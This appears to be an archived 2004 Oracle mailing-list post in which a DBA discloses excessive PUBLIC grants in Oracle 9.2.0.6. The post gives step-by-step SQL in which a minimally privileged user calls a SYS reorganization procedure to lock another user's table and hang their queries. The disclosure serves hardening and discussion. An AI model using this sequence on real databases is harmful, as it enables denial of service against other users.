Still too many privileges granted to PUBLIC in 9.2.0.6

Links

Frequent Oracle Errors

•	TNS:could not resolve the connect identifier specified
•	Backtrace message unwound by exceptions
•	invalid identifier
•	PL/SQL compilation error
•	internal error
•	missing expression
•	table or view does not exist
•	end-of-file on communication channel
•	TNS:listener unknown in connect descriptor
•	insufficient privileges
•	PL/SQL: numeric or value error string
•	TNS:protocol adapter error
•	ORACLE not available
•	target host or object does not exist
•	invalid number
•	unable to allocate string bytes of shared memory
•	resource busy and acquire with NOWAIT specified
•	error occurred at recursive SQL level string
•	ORACLE initialization or shutdown in progress
•	archiver error. Connect internal only, until freed
•	snapshot too old
•	unable to extend temp segment by string in tablespace
•	Credential retrieval failed
•	missing or invalid option
•	invalid username/password; logon denied
•	unable to create INITIAL extent for segment
•	out of process memory when trying to allocate string bytes
•	shared memory realm does not exist
•	cannot insert NULL
•	TNS:unable to connect to destination
•	remote database not found'>ora-02019
•	exception encountered: core dump
•	inconsistent datatypes
•	no data found
•	TNS:operation timed out
•	PL/SQL: could not find program
•	existing state of packages has been discarded
•	maximum number of processes exceeded
•	error signaled in parallel query server
•	ORACLE instance terminated. Disconnection forced
•	TNS:packet writer failure
•	see ORA-12699
•	missing right parenthesis
•	name is already used by an existing object
•	cannot identify/lock data file
•	invalid file operation
•	quoted string not properly terminated

Still too many privileges granted to PUBLIC in 9.2.0.6

Still too many privileges granted to PUBLIC in 9.2.0.6

2004-11-16 - By Van Winssen, Andre A SITI-ITIBHW5

Lectori Salutem,
after the NIGHTMARE we had over here with applying patches for security alert #68 (hundreds of them) we started
thinking more about 'hacking ' and what else could cause database service disruptions.
One of the things I am still worried about are to GRANTS to public after a database creation (9.2.0.6).
See below:
SQL > L
1 select privilege,owner,count(*) from dba_tab_privs
2* where grantee= 'PUBLIC ' and owner= 'SYS ' group by privilege,owner
SQL > /

PRIVILEGE OWNER COUNT(*)
-- ---- ---- ---- -- -- ---- ---- ---- -- -- ---- --
DEBUG SYS 12
UNDER SYS 1
DELETE SYS 3
INSERT SYS 4
SELECT SYS 776
UPDATE SYS 2
EXECUTE SYS 443

A little test shows how easy it is to disrupt database service using a login that merely has create session priv.

1) create user test identified by dom;
grant create session to test;
2) create user testdba identified by slim;
grant connect,dba to testdba;
3) connect testdba/slim
create table tabje (c1 number);
insert into tabje values (1);
commit;
select * from tabje;
> > row returned
4) start another session:
connect test/dom
exec sys.dbms_snapshot.BEGIN_TABLE_REORGANIZATION( 'TESTDBA ', 'TABJE ')

If TESTDBA in 4) tries to rerun the select now it hangs and never returns until user TEST in step 4 does commit or rollback

Fortunately this fails for objects required for warmstarting the database like SYS.OBJ$.
".ORA-00701 (See ORA-00701.ora-code.com): object necessary for warmstarting database cannot be altered "

I am quite sure that a little research in the list of sys owned plsql objects for which the grantee is PUBLIC will
demonstrate more possibilities.

Please share comments.

Kind regards,

André van Winssen

--
http://www.freelists.org/webpage/oracle-l